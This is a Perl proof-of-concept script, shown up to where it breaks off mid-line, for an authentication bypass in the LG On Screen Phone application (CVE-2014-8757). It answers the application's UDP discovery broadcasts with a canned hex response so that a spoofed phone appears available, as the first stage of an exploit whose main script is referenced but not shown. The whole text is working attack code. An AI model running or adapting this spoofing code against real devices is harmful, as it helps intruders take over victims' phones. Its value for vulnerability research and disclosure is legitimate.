#!/usr/bin/perl # # PoC code for LG On Screen Phone authentication bypass vulnerability (CVE-2014-8757), # discovered by Imre Rad, Search-Lab Ltd. # # This helper script listens for discovery broadcast messages of the official LG On Screen Phone # application and answers them, so the application would believe a Phone running OSP is available locally. # # The seconds script, osp-proxy.pl excepts the actual communication and exploits the vulnerability. # use strict; use warnings; use IO::Socket::INET; my $discovery = IO::Socket::INET->new( LocalPort => 19528, Proto => 'udp' ) or die "couldnt: $! $@"; while(1) { # read operation on the socket my $recieved_data = myrecv($discovery); # print "recvd: $recieved_data ".$discovery->peerhost().":".$discovery->peerport()."\n"; my $answer = IO::Socket::INET->new( PeerAddr => $discovery->peerhost().":".$discovery->peerport(), Proto => 'udp' ) or die "couldnt: $! $@"; mysend($answer, " 00000000 19 76 73 7f 73 48 63 16 73 0b 73 41 63 4c 73 0e .vs.sHc. s.sAcLs. 00000010 73 47 63 47 73 5c 73 14 63 47 73 0a 73 49 63 4d sGcGss. cGs.sIcM 00000020 73 58 73 11 63 7d 73 3f 73 02 63 1b 73 17 73 09 sXs.c}s? s.c.s.s. 00000030 63 54 73 00 73 03 63 04 cTs.s.c. "); $answer->close(); } sub mysend { my $sock = shift; my $msg = shift; my $bin = ""; $msg =~ s/^\s*[0-9a-f]{8} //gm; while($msg =~ /([0-9a-f]{2}) /g) { $bin .= pack("H*",$1); } print ">> ".unpack("H*", $bin)."\n\n"; print $sock $bin ; } sub myrecv { my $sock = shift; my ($re, $r); $r = $sock->recv($re, 4096) ; die "couldnt read: $@" if(!$r); print "<< ".unpack("H*", $re)."\n"; print "<